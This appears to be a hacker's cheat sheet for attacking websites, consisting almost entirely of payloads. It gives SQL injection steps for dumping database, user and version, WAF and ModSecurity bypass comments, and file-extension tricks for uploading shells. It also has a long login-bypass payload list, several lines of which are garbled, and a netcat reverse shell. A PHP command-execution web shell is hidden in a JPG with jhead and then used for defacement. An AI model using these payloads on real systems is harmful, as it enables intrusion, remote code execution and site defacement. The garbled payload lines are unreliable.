Basic SQL Injection
Check Vuln.

http://www.target.com/index.php?id=25'

Check How many Column Order By Method.

http://www.target.com/index.php?id=25 order by 10-- -> error
http://www.target.com/index.php?id=25 order by 9-- -> not error

Check Vulnerable Column Union Select Method.

http://www.target.com/index.php?id=25+Union+Select+1,2,3,4,5,6,7,8,9--

Print Database,Version and User

http://www.target.com/index.php?id=25+Union+Select+1,concat(database(),
user(),version()),3,4,5,
6,7,8,9--
Bypass 403 Forbidden SQLi
/*!50000*/

/*!50000UNION*/+/*!50000SELECT*/
Bypass Mod Security SQLi
/*!00000*/

/*!00000UNION*/+/*!00000SELECT*/
Shell Upload Bypass Extensions
shell.phtml
shell.php jpg
shell.php.txt
shell.php;_.fla
shell.pjpeg
shell.cin
shell.shtml
shell.pjpg.php.jpg
shell.php;.jpg
shell.php.xxxjpg
shell.php.test
shell.php3
shell.php5
shell.jpg.PhP
shell.php.jpg
shell.php.fla
shell.php%00.jpg
shell.php.;jpg
shell.PhP.txt
shell.php.png
shell.php.gif
Bypass Login Authentication
18 or 1=1 13
1'or 191'= 191
admin 19 13
1d or 0=0 13
or 0=0 13
18 or 0=0 #
1d or 0=0 #
or 0=0 #
18 or 18x 19='x
1d or 1cx 1d= 1dx
18) or ( 18x 19='x
18 or 1=1 13
1d or 1=1 13
or 1=1 13
18 or a=a 13
1d or 1ca 1d= 1da
18) or ( 18a 19='a
1c) or ( 1ca 1d= 1da
hi 1d or 1ca 1d= 1da
hi 1d or 1=1 13
hi 19 or 1=1 13
hi 19 or 18a 19='a
hi 19) or ( 18a 19='a
hi 1d) or ( 1ca 1d= 1d)
admin'--
= 'or' 1=1
' or 1=1--
'" or 1=1--
' union select 1, 'Eyeless', 'ez2do', 1--
admin'--
administrator'--
superuser'--
test'--
' or 0=0 --
' or 0=0 --'
' or 0=0 #
" or 0=0 --
" or 0=0 --'
'" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
" or 1=1--
or 1=1--
' or a=a--'
' or a=a #
' or a=a--
' or "a"="a
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") Or ("a"="a
' Or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" Or "a"="a
') or ('a'='a
How to use reverse shell
Open Termux:

pkg install netcat

nc -lnvp 4444
nc -e /bin/sh 127.0.0.1 4444
How to make jpg shell using Jhead
Open Termux

Command:
pkg install jhead
jhead -purejpg shell.jpg
jhead -ce shell.jpg

if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);} '__halt_compiler();

jhead shell.jpg

Upload File:
/shell.php?cmd=ls
/shell.php?cmd=echo 'Baba Fucked Your Site' > baba.txt
How to run localhost using termux
Open termux

Command:
pkg install php
php -S localhost:8080